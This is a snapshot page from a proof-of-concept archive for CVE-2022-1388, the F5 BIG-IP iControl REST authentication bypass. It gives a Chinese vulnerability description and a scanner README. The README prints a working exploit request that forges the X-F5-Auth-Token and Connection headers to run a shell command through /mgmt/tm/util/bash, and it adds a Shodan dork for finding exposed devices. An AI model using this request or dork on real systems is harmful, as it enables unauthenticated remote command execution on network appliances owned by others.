Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2022-1388 PoC — F5 BIG-IP 访问控制错误漏洞

Source
Associated Vulnerability
Title:F5 BIG-IP 访问控制错误漏洞 (CVE-2022-1388)
Description:F5 BIG-IP是美国F5公司的一款集成了网络流量管理、应用程序安全管理、负载均衡等功能的应用交付平台。 F5 BIG-IP 存在访问控制错误漏洞,攻击者可以通过未公开的请求利用该漏洞绕过BIG-IP中的iControl REST身份验证来控制受影响的系统。
Readme
# F5 CVE-2022-1388 Scanner
[![forthebadge](https://forthebadge.com/images/badges/made-with-python.svg)](https://forthebadge.com)
[![forthebadge](https://forthebadge.com/images/badges/built-with-love.svg)](https://forthebadge.com)
> BIG-IP iControl REST vulnerability CVE-2022-1388 Scanner

<p align="center">
  <img src="Img/CVE-2022-1388-Scanner.png" alt="Master">
</p>

## Usage
```
# pip install -r requirements.txt
# pytohn3 CVE-2022-1388-Scanner.py
```


## Request
```
POST /mgmt/tm/util/bash HTTP/1.1
Host: REDACTED:8083
Content-Length: 45
Connection: Keep-Alive, X-F5-Auth-Token
Cache-Control: max-age=0
X-F5-Auth-Token: vvs
Authorization: Basic YWRtaW46

{
"command":"run",
"utilCmdArgs":"-c id"
}
```

## Shodan Dork:
```http.title:"BIG-IP&reg;-+Redirect" +"Server"```
File Snapshot

[4.0K] /data/pocs/beb2a751eb873ee716091fecc5029c3b5c5c5fb1 ├── [3.6K] CVE-2022-1388-Scanner.py ├── [4.0K] Img │   ├── [ 88K] CVE-2022-1388-Scanner.png │   └── [ 2] f ├── [ 779] README.md └── [ 33] requirements.txt 1 directory, 5 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.